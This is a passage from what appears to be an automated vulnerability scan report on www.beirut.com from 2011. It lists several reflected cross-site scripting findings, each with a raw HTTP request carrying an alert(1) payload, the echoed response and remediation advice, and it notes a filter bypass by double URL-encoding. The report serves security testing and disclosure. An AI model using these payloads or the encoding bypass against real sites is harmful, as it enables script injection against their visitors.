<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Moviesddf69"><a>ce7e68797bc">
...[SNIP]...

4.571. http://www.beirut.com/Movies/Cinemas/Metropolis-Empire-Sofil/1085 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Metropolis-Empire-Sofil/1085

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49beb'-alert(1)-'aa6dac3381f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Movies49beb'-alert(1)-'aa6dac3381f/Cinemas/Metropolis-Empire-Sofil/1085 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Movies49beb'-alert(1)-'aa6dac3381f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.572. http://www.beirut.com/Movies/Cinemas/Metropolis-Empire-Sofil/1085 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Metropolis-Empire-Sofil/1085

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a9d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d0c3c5ce29 was submitted in the REST URL parameter 4. This input was echoed as 72a9d"><script>alert(1)</script>6d0c3c5ce29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Movies/Cinemas/Metropolis-Empire-Sofil/108572a9d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6d0c3c5ce29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:50:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=Movies&listingtype=movies.php&Types=108572a9d"><script>alert(1)</script>6d0c3c5ce29">
...[SNIP]...

4.573. http://www.beirut.com/Movies/Cinemas/Sodeco/1084 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Sodeco/1084

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ddef'-alert(1)-'464af40d1e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Movies5ddef'-alert(1)-'464af40d1e2/Cinemas/Sodeco/1084 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:43:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Movies5ddef'-alert(1)-'464af40d1e2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.574. http://www.beirut.com/Movies/Cinemas/Sodeco/1084 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Sodeco/1084

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93206"><a>fb5a3355424 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Movies93206"><a>fb5a3355424/Cinemas/Sodeco/1084 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:34:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Movies93206"><a>fb5a3355424">
...[SNIP]...

4.575. http://www.beirut.com/Movies/Cinemas/Sodeco/1084 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies/Cinemas/Sodeco/1084

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2fd7090c40 was submitted in the REST URL parameter 4. This input was echoed as 98d6b"><script>alert(1)</script>2fd7090c40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Movies/Cinemas/Sodeco/108498d6b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2fd7090c40 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:56:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=blue&indexpage=Movies&listingtype=movies.php&Types=108498d6b"><script>alert(1)</script>2fd7090c40">
...[SNIP]...

4.576. http://www.beirut.com/Nightlife/Downtown/I-Bar/67 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Downtown/I-Bar/67

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db684%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7a64b1fbb87 was submitted in the REST URL parameter 4. This input was echoed as db684"><script>alert(1)</script>7a64b1fbb87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Downtown/I-Bar/67db684%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7a64b1fbb87 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:11:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=67db684"><script>alert(1)</script>7a64b1fbb87&randstyle=magenta">
...[SNIP]...

4.577. http://www.beirut.com/Nightlife/Downtown/I-Bar/67 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Downtown/I-Bar/67

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b37c9%2527%253balert%25281%2529%252f%252fa075a4b6c42 was submitted in the REST URL parameter 4. This input was echoed as b37c9';alert(1)//a075a4b6c42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Downtown/I-Bar/67b37c9%2527%253balert%25281%2529%252f%252fa075a4b6c42 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:12:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='67b37c9';alert(1)//a075a4b6c42';
var showfacebox='';
</script>
...[SNIP]...

4.578. http://www.beirut.com/Nightlife/Gemmayzeh/Godot/85 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Gemmayzeh/Godot/85

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 709e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b037f0a052 was submitted in the REST URL parameter 4. This input was echoed as 709e2"><script>alert(1)</script>2b037f0a052 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Gemmayzeh/Godot/85709e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b037f0a052 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 09:48:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=85709e2"><script>alert(1)</script>2b037f0a052&randstyle=blue">
...[SNIP]...

4.579. http://www.beirut.com/Nightlife/Gemmayzeh/Godot/85 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Gemmayzeh/Godot/85

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a51e%2527%253balert%25281%2529%252f%252ff576ccc308a was submitted in the REST URL parameter 4. This input was echoed as 8a51e';alert(1)//f576ccc308a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Gemmayzeh/Godot/858a51e%2527%253balert%25281%2529%252f%252ff576ccc308a HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 09:48:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='858a51e';alert(1)//f576ccc308a';
var showfacebox='';
</script>
...[SNIP]...

4.580. http://www.beirut.com/Nightlife/Gemmayzeh/Joe-Penas/91 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Gemmayzeh/Joe-Penas/91

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f9c0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee0172335a8d was submitted in the REST URL parameter 4. This input was echoed as 4f9c0"><script>alert(1)</script>e0172335a8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Gemmayzeh/Joe-Penas/914f9c0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee0172335a8d HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:12:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=914f9c0"><script>alert(1)</script>e0172335a8d&randstyle=magenta">
...[SNIP]...

4.581. http://www.beirut.com/Nightlife/Gemmayzeh/Joe-Penas/91 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Gemmayzeh/Joe-Penas/91

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e1d4%2527%253balert%25281%2529%252f%252fe8962f00d7e was submitted in the REST URL parameter 4. This input was echoed as 5e1d4';alert(1)//e8962f00d7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Gemmayzeh/Joe-Penas/915e1d4%2527%253balert%25281%2529%252f%252fe8962f00d7e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 10:15:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='915e1d4';alert(1)//e8962f00d7e';
var showfacebox='';
</script>
...[SNIP]...

4.582. http://www.beirut.com/Nightlife/Hamra/Li-Beirut/1885 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Nightlife/Hamra/Li-Beirut/1885

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77985%2527%253balert%25281%2529%252f%252ff4366c598f1 was submitted in the REST URL parameter 4. This input was echoed as 77985';alert(1)//f4366c598f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Nightlife/Hamra/Li-Beirut/188577985%2527%253balert%25281%2529%252f%252ff4366c598f1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 09:54:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
